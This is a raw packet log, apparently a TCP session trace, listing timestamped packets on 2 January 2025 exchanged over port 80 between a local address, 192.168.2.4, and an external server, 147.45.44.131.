Jan 2, 2025 19:13:05.569871902 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569874048 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569881916 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569894075 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569899082 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569904089 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569912910 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569925070 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569925070 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569942951 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569942951 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569958925 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569971085 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569972038 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569982052 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569993973 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570000887 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570009947 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570020914 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570029020 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570031881 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570044041 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570046902 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570054054 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570065022 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570074081 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570082903 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570101023 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570101976 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570106983 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570116997 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570128918 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570132971 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570139885 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570149899 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570151091 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570162058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570168018 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570173025 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570185900 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570185900 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570195913 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570207119 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570211887 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570218086 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570226908 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570239067 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570245028 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570250034 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570260048 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570261955 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570271015 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570281982 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570285082 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570292950 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570293903 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570306063 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570312977 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570316076 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570327044 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570338011 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570338011 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570348978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570358992 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570369959 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570370913 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570380926 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570388079 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570390940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570401907 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570404053 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570413113 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570424080 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.570426941 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.570466995 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.571973085 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.571985006 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.571995974 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572001934 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.572006941 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572020054 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572026014 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.572060108 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.572103977 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572113991 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572123051 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572133064 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572145939 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572145939 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.572156906 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572165012 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.572168112 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572186947 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.572235107 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572244883 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572254896 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572267056 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572268009 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.572278976 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572284937 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.572289944 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572300911 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572305918 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.572335958 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.572371006 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572381973 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.572410107 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655241013 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655261040 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655282974 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655303001 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655303001 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655318975 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655333042 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655340910 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655344963 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655364990 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655369997 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655380964 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655392885 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655401945 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655405045 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655415058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655428886 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655431986 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655452013 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655457020 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655462980 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655482054 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655484915 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655493975 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655507088 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655515909 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655529022 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655529976 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655539036 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655550003 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655555964 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655565977 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655582905 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655584097 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655594110 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655600071 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655608892 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655618906 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655633926 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655637980 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655647039 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655661106 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655666113 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655672073 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655679941 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655683041 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655694962 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655704021 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655706882 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655715942 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655728102 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655740976 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655742884 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655756950 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655765057 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655767918 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655776978 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655781984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655791044 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655801058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655807972 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655812025 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655827045 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655838966 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655841112 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655849934 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655858994 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655863047 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655868053 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655874014 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655884981 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655894995 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655896902 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655910015 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655921936 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655922890 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655932903 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655941963 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655955076 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655956030 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655965090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655977964 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655981064 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.655991077 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.655998945 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656002998 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656013966 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656013966 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656024933 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656035900 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656043053 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656047106 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656055927 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656068087 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656069040 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656080008 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656091928 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656091928 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656100035 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656111002 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656124115 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656131029 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656133890 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656145096 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656155109 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656155109 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656164885 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656176090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656188011 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656189919 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656198978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656210899 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656212091 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656223059 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656234026 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656238079 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656246901 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656255960 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656258106 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656271935 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656271935 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656282902 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656296015 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656296015 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656306982 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656318903 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656318903 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656327963 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656337976 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656349897 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656353951 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656361103 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656372070 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656382084 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656383038 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656393051 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656403065 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656414986 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656421900 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656425953 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656436920 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656445980 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656446934 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656457901 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656460047 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.656480074 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.656501055 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.657864094 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.657980919 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.657990932 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658001900 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658014059 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658016920 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.658026934 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658035040 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.658036947 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658049107 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658061981 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658073902 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.658080101 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.658093929 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658106089 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658114910 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658123970 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658130884 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658138990 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.658143044 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658176899 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.658185005 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658195972 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658205986 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658219099 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658226013 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.658230066 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658242941 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658246994 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.658255100 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.658262968 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.658294916 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.741349936 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741379976 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741390944 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741401911 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741413116 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741437912 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741455078 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741460085 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.741465092 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741477013 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741487026 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741494894 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741501093 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741506100 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741570950 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741581917 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741591930 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741600990 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741610050 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741611958 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.741611958 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.741611958 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.741626024 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741636992 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741641045 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.741647959 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741667032 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741671085 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.741677046 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741687059 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741703987 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741709948 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.741713047 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741724014 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741734982 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741734982 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.741750956 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741755962 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.741761923 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741774082 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741781950 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.741784096 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741801977 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741815090 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.741816998 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741827965 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741835117 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.741842985 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741854906 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741863012 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.741867065 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741878033 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741888046 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741894007 CET	49731	80	192.168.2.4	147.45.44.131
